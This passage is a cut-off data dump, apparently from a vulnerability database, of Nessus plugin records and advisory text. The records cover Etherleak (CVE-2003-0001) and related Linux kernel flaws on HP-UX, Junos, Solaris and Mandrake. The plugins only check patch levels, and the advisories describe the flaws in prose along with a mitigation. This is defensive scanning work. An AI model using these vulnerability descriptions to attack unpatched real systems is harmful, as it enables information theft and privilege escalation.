"NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_29267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_29267. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17420);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_29267 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_29267 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_29267 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_29267\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.LAN-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.LAN2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:50:04", "references": ["https://lkml.org/lkml/2002/4/27/101", "https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10579", "http://blog.spoofed.org/2007/03/etherleak-old-dog-old-tricks.html"], "pluginID": "68912", "description": "According to its self-reported version number, the remote Junos device has an information disclosure vulnerability. SRX1400, SRX3400, and SRX3600 services gateways pad Ethernet packets with data from previous packets instead of padding them with null bytes. A remote, unauthenticated attacker could exploit this to gain access to sensitive information, which could be used to mount further attacks.", "edition": 7, "reporter": "Tenable", "published": "2013-07-16T00:00:00", "title": "Juniper Junos SRX1400/3400/3600 Etherleak Information Disclosure (JSA10579)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Junos Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001", "CVE-2013-4690"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10579.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68912", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68912);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\n \"CVE-2003-0001\", # generic etherleak vulnerability\n \"CVE-2013-4690\" # etherleak in junos\n );\n script_bugtraq_id(\n 6535, # generic etherleak vulnerability\n 61123 # etherleak in junos\n );\n script_xref(name:\"CERT\", value:\"412115\"); # generic etherleak vulnerability\n\n script_name(english:\"Juniper Junos SRX1400/3400/3600 Etherleak Information Disclosure (JSA10579)\");\n script_summary(english:\"Checks version, model, and build date\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its self-reported version number, the remote Junos device\nhas an information disclosure vulnerability. SRX1400, SRX3400, and\nSRX3600 services gateways pad Ethernet packets with data from previous\npackets instead of padding them with null bytes. A remote,\nunauthenticated attacker could exploit this to gain access to sensitive\ninformation, which could be used to mount further attacks.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://lkml.org/lkml/2002/4/27/101\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.spoofed.org/2007/03/etherleak-old-dog-old-tricks.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10579\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the relevant Junos upgrade referenced in Juniper advisory\nJSA10579.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/04/27\"); # disclosed on LKML\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/model\", \"Host/Juniper/JUNOS/Version\", \"Host/Juniper/JUNOS/BuildDate\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nbuild_date = get_kb_item_or_exit('Host/Juniper/JUNOS/BuildDate');\n\nif (model != 'SRX1400' && model != 'SRX3400' && model != 'SRX3600')\n audit(AUDIT_HOST_NOT, 'SRX1400/3400/3600');\nif (compare_build_dates(build_date, '2013-06-20') >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver + ' (build date ' + build_date + ')');\nif (ver == '11.4R7-S1' || ver == '12.1R5-S3')\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver);\n\nfixes['10.4'] = '10.4S13';\nfixes['11.4'] = '11.4R8';\nfixes['12.1'] = '12.1R7';\nfixes['12.1X44'] = '12.1X44-D20';\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\nif (report_verbosity > 0)\n{\n report = get_report(ver:ver, fix:fix, model:model);\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:00:54", "references": ["http://www.nessus.org/u?a18ed6f3", "https://support.oracle.com/rs?type=doc&id=1956176.1", "http://www.nessus.org/u?c02f1515"], "pluginID": "80936", "description": "This Solaris system is missing necessary patches to address critical security updates :\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver).\n Supported versions that are affected are 10 and 11.\n Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.\n (CVE-2003-0001)\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to Operating System. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Solaris accessible data and ability to cause a partial denial of service (partial DOS) of Solaris. (CVE-2015-0429)\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to Operating System. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data. (CVE-2015-0430)", "edition": 5, "reporter": "Tenable", "published": "2015-01-23T00:00:00", "title": "Oracle Solaris Critical Patch Update : jan2015_SRU11_1_11_4_0", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001", "CVE-2015-0430", "CVE-2015-0429"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1"], "id": "SOLARIS_JAN2015_SRU11_1_11_4_0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle CPU for jan2015.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80936);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/30 15:31:32\");\n\n script_cve_id(\"CVE-2003-0001\", \"CVE-2015-0429\", \"CVE-2015-0430\");\n script_bugtraq_id(6535, 72133, 72141);\n\n script_name(english:\"Oracle Solaris Critical Patch Update : jan2015_SRU11_1_11_4_0\");\n script_summary(english:\"Check for the jan2015 CPU\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch from CPU\njan2015.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Solaris system is missing necessary patches to address critical\nsecurity updates :\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: AMD pcnet driver).\n Supported versions that are affected are 10 and 11.\n Easily exploitable vulnerability allows successful\n unauthenticated network attacks via TCP/IP. Successful\n attack of this vulnerability can result in unauthorized\n read access to a subset of Solaris accessible data.\n (CVE-2003-0001)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to\n Operating System. Successful attack of this\n vulnerability can result in unauthorized update, insert\n or delete access to some Solaris accessible data and\n ability to cause a partial denial of service (partial\n DOS) of Solaris. (CVE-2015-0429)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to\n Operating System. Successful attack of this\n vulnerability can result in unauthorized read access to\n a subset of Solaris accessible data. (CVE-2015-0430)\"\n );\n # http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2367957.xml\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a18ed6f3\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c02f1515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.oracle.com/rs?type=doc&id=1956176.1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the jan2015 CPU from the Oracle support website.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\n\n\nfix_release = \"0.5.11-0.175.1.11.0.4.0\";\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.11.0.4.0\", sru:\"11.1.11.4.0\") > 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:solaris_get_report2());\n else security_warning(0);\n exit(0);\n}\naudit(AUDIT_OS_RELEASE_NOT, \"Solaris\", fix_release, release);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:39:25", "references": [], "pluginID": "14023", "description": "A number of vulnerabilities have been found in the Linux 2.2 kernel that have been addressed with the latest 2.2.25 release.\n\nA bug in the kernel module loader code could allow a local user to gain root privileges. This is done by a local user using ptrace and attaching to a modprobe process that is spawned if the user triggers the loading of a kernel module.\n\nA temporary workaround can be used to defend against this flaw. It is possible to temporarily disable the kmod kernel module loading subsystem in the kernel after all of the required kernel modules have been loaded. Be sure that you do not need to load additional kernel modules after implementing this workaround. To use it, as root execute :\n\necho /no/such/file >/proc/sys/kernel/modprobe\n\nTo automate this, you may wish to add it as the last line of the /etc/rc.d/rc.local file. You can revert this change by replacing the content '/sbin/modprobe' in the /proc/sys/kernel/modprobe file. The root user can still manually load kernel modules with this workaround in place.\n\nAs well, multiple ethernet device drivers do not pad frames with null bytes, which could allow remote attackers to obtain information from previous packets or kernel memory by using malformed packets.\n\nFinally, the 2.2 kernel allows local users to cause a crash of the host system by using the mmap() function with a PROT_READ parameter to access non-readable memory pages through the /proc/pid/mem interface.\n\nAll users are encouraged to upgrade to the latest kernel version provided.\n\nFor instructions on how to upgrade your kernel in Mandrake Linux, please refer to :\n\nhttp://www.mandrakesecure.net/en/kernelupdate.php", "edition": 5, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kernel22 (MDKSA-2003:039)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0127", "CVE-2003-0001", "CVE-2002-1380"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-pcmcia-cs", "cpe:/o:mandrakesoft:mandrake_linux:7.2", "p-cpe:/a:mandriva:linux:kernel22-smp", "p-cpe:/a:mandriva:linux:alsa", "p-cpe:/a:mandriva:linux:kernel22", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:kernel22-source", "p-cpe:/a:mandriva:linux:alsa-source", "p-cpe:/a:mandriva:linux:reiserfs-utils", "p-cpe:/a:mandriva:linux:kernel", "p-cpe:/a:mandriva:linux:kernel-source", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:kernel-secure", "p-cpe:/a:mandriva:linux:kernel-utils", "p-cpe:/a:mandriva:linux:kernel-headers", "p-cpe:/a:mandriva:linux:kernel-doc", "p-cpe:/a:mandriva:linux:kernel-smp"], "id": "MANDRAKE_MDKSA-2003-039.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14023", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:039. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14023);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2002-1380\", \"CVE-2003-0001\", \"CVE-2003-0127\");\n script_xref(name:\"MDKSA\", value:\"2003:039\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel22 (MDKSA-2003:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been found in the Linux 2.2 kernel\nthat have been addressed with the latest 2.2.25 release.\n\nA bug in the kernel module loader code could allow a local user to\ngain root privileges. This is done by a local user using ptrace and\nattaching to a modprobe process that is spawned if the user triggers\nthe loading of a kernel module.\n\nA temporary workaround can be used to defend against this flaw. It is\npossible to temporarily disable the kmod kernel module loading\nsubsystem in the kernel after all of the required kernel modules have\nbeen loaded. Be sure that you do not need to load additional kernel\nmodules after implementing this workaround. To use it, as root \nexecute :\n\necho /no/such/file >/proc/sys/kernel/modprobe\n\nTo automate this, you may wish to add it as the last line of the\n/etc/rc.d/rc.local file. You can revert this change by replacing the\ncontent '/sbin/modprobe' in the /proc/sys/kernel/modprobe file. The\nroot user can still manually load kernel modules with this workaround\nin place.\n\nAs well, multiple ethernet device drivers do not pad frames with null\nbytes, which could allow remote attackers to obtain information from\nprevious packets or kernel memory by using malformed packets.\n\nFinally, the 2.2 kernel allows local users to cause a crash of the\nhost system by using the mmap() function with a PROT_READ parameter to\naccess non-readable memory pages through the /proc/pid/mem interface.\n\nAll users are encouraged to upgrade to the latest kernel version\nprovided.\n\nFor instructions on how to upgrade your kernel in Mandrake Linux,\nplease refer to :\n\nhttp://www.mandrakesecure.net/en/kernelupdate.php\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:alsa-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-pcmcia-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:reiserfs-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"alsa-2.2.25_0.5.11-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"alsa-source-2.2.25_0.5.11-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-doc-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-headers-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-pcmcia-cs-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-secure-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-utils-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"reiserfs-utils-2.2.25_3.5.29-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:25", "references": ["http://marc.info/?l=bugtraq&m=105664924024009&w=2"], "pluginID": "14049", "description": "Multiple vulnerabilities were discovered and fixed in the Linux kernel.\n\n - CVE-2003-0001: Multiple ethernet network card drivers do not pad frames with null bytes which allows remote attackers to obtain information from previous packets or kernel memory by using special malformed packets.\n\n - CVE-2003-0244: The route cache implementation in the 2.4 kernel and the Netfilter IP conntrack module allows remote attackers to cause a Denial of Service (DoS) via CPU consumption due to packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain.\n\n - CVE-2003-0246: The ioperm implementation in 2.4.20 and earlier kernels does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n\n - CVE-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel allows attackers to cause a kernel oops resulting in a DoS.\n\n - CVE-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to modify CPU state registers via a malformed address.\n\n - CVE-2003-0462: A file read race existed in the execve() system call.\n\nAs well, a number of bug fixes were made in the 9.1 kernel including :\n\n - Support for more machines that did not work with APIC\n\n - Audigy2 support\n\n - New/updated modules: prims25, adiusbadsl, thinkpad, ieee1394, orinoco, via-rhine,\n\n - Fixed SiS IOAPIC\n\n - IRQ balancing has been fixed for SMP\n\n - Updates to ext3\n\n - The previous ptrace fix has been redone to work better\n\n - Bugs with compiling kernels using xconfig have been fixed\n\n - Problems with ipsec have been corrected\n\n - XFS ACLs are now present\n\n - gdb not working on XFS root filesystems has been fixed\n\nMandrakeSoft encourages all users to upgrade to these new kernels.\nUpdated kernels will be available shortly for other supported platforms and architectures.\n\nFor full instructions on how to properly upgrade your kernel, please review http://www.mandrakesecure.net/en/docs/magic.php.\n\nUpdate :\n\nThe kernels provided in MDKSA-2003:066-1 (2.4.21-0.24mdk) had a problem where all files created on any filesystem other than XFS, and using any kernel other than kernel-secure, would be created with mode 0666, or world writeable. The 0.24mdk kernels have been removed from the mirrors and users are encouraged to upgrade and remove those kernels from their systems to prevent accidentally booting into them.\n\nThat issue has been addressed and fixed with these new kernels.", "edition": 5, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kernel (MDKSA-2003:066-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2003-0462"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-2.4.21.0.25mdk", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-BOOT-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:kernel-secure-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-doc"], "id": "MANDRAKE_MDKSA-2003-066.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14049", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:066. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14049);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0462\");\n 